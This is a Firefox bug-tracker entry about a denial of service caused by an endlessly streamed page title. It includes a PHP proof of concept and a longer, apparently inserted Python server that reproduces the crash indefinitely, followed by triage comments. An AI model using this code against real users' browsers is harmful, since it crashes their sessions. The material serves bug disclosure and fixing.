Open Bug 1781147 Opened 2 years ago Updated 6 months ago

firefox denial-of-service triggered by infinitely long page title

Categories

(Core :: Graphics: WebRender, defect)

defect

Tracking

()

People

(Reporter: pho.sco.glass, Unassigned)

References

(Blocks 2 open bugs)

Details

(Keywords: csectype-dos, reporter-external, Whiteboard: [reporter-external] [client-bounty-form] [verif?])

Firefox Browser version 102.2.1 on Android 12

I am able to cause firefox to crash using the following code:

test.php -------

<!doctype html>
<html>
<head>
<title><?php
// The <title> element is deliberately never closed and the file has no
// closing PHP tag (optional in PHP): the loop streams "a" until the
// connection drops, so the browser receives an unbounded title.
for (;;) { echo "a"; }

Flags: sec-bounty?
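For anyone reproducing this without a PHP stack: the following is an added example, not part of the bug report, that serves the same document as the PoC above (an opened <title> that is never closed) from a small Python HTTP server, streaming the title bytes over chunked transfer encoding. The max_bytes cap, the 4 KiB block size and the 127.0.0.1:8000 bind address are assumptions added here so the server can also be exercised safely in a test; with max_bytes left at None it streams indefinitely, exactly like the PHP loop.

```python
"""Reproduction server for the unbounded <title> denial of service.

Added example, not the reporter's code: emits the same prefix as the PHP
PoC and then streams title bytes forever (or up to max_bytes, an assumed
safety cap added here for testing) using chunked transfer coding.
"""
import http.server
import socketserver
from typing import Iterator, Optional

# Same document head as test.php: the <title> element is never closed.
PREFIX = b"<!doctype html>\n<html>\n<head>\n<title>"
# The PHP loop echoes one byte per iteration; sending 4 KiB blocks is
# equivalent on the wire and much cheaper for the server (assumed size).
CHUNK = b"a" * 4096


def title_stream(max_bytes: Optional[int] = None) -> Iterator[bytes]:
    """Yield the document prefix, then title bytes until max_bytes (or forever)."""
    yield PREFIX
    sent = 0
    while max_bytes is None or sent < max_bytes:
        block = CHUNK if max_bytes is None else CHUNK[: max_bytes - sent]
        sent += len(block)
        yield block


def collect(max_bytes: int) -> bytes:
    """Materialise a bounded run of the stream (for testing, never unbounded)."""
    return b"".join(title_stream(max_bytes))


def chunk(block: bytes) -> bytes:
    """Encode one block per the HTTP/1.1 chunked transfer coding."""
    return b"%x\r\n%s\r\n" % (len(block), block)


class TitleHandler(http.server.BaseHTTPRequestHandler):
    protocol_version = "HTTP/1.1"  # chunked encoding requires HTTP/1.1
    max_bytes: Optional[int] = None  # None reproduces the PoC: stream forever

    def do_GET(self) -> None:
        self.send_response(200)
        self.send_header("Content-Type", "text/html; charset=utf-8")
        self.send_header("Transfer-Encoding", "chunked")
        self.end_headers()
        try:
            for block in title_stream(self.max_bytes):
                self.wfile.write(chunk(block))
                self.wfile.flush()  # push each block instead of buffering
            self.wfile.write(b"0\r\n\r\n")  # terminating chunk (only if capped)
        except (BrokenPipeError, ConnectionResetError):
            pass  # the tab crashed or the browser closed the connection


if __name__ == "__main__":
    # Point the browser under test at http://127.0.0.1:8000/ (assumed address).
    with socketserver.ThreadingTCPServer(("127.0.0.1", 8000), TitleHandler) as srv:
        srv.serve_forever()
```

Run it in a throwaway VM or container rather than on a machine whose browser session you care about: a single tab pointed at it is enough to make the browser unresponsive, as the later comments in this bug describe. Setting TitleHandler.max_bytes to a few megabytes gives a bounded variant that is useful for checking where a fix caps or truncates the title.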

--> Fenix for initial triage, given this was reported as a mobile bug.

Group: firefox-core-security → mobile-core-security
Component: Security → Security: Android
Product: Firefox → Fenix

This file looks incomplete; there is no closing PHP tag. The file looks to create an infinitely long title. This looks like a variation of bug 432687.

Keywords: csectype-dos
Blocks: eviltraps
Group: mobile-core-security
Status: UNCONFIRMED → NEW
Ever confirmed: true

> This file looks incomplete, there is no closing PHP tag.

The closing tag at the end of a PHP file is optional.

I tested this and reproduced on both Desktop and Android, which both become unresponsive and eventually crash. Ideally, a fix here shouldn't be mobile-specific.

Component: Security: Android → Security
Product: Fenix → Core
Summary: firefox denial-of-service on mobile phone → firefox denial-of-service triggered by infinitely long page title

The severity field is not set for this bug.
:dveditz, could you have a look please?

For more information, please visit auto_nag documentation.

Flags: needinfo?(dveditz)
Component: Security → DOM: Core & HTML
Flags: sec-bounty?
Flags: sec-bounty-
Flags: needinfo?(dveditz)

Interestingly, on desktop this manages to crash the parent due to a too large IPC message. Let's start by addressing that, since it's arguably more severe than a content process reaching an nsString length limit or similar.
https://crash-stats.mozilla.org/report/index/3f5a8c49-46bc-40ff-92c7-cb3d60221124

Component: DOM: Core & HTML → Graphics: WebRender

The severity field is not set for this bug.
:gw, could you have a look please?

For more information, please visit auto_nag documentation.

Flags: needinfo?(gwatson)
Severity: -- → S3
Flags: needinfo?(gwatson)

From the crash stack this looks like it could be another instance of bug 1772994.

See Also: → 1772994
See Also: → 1827778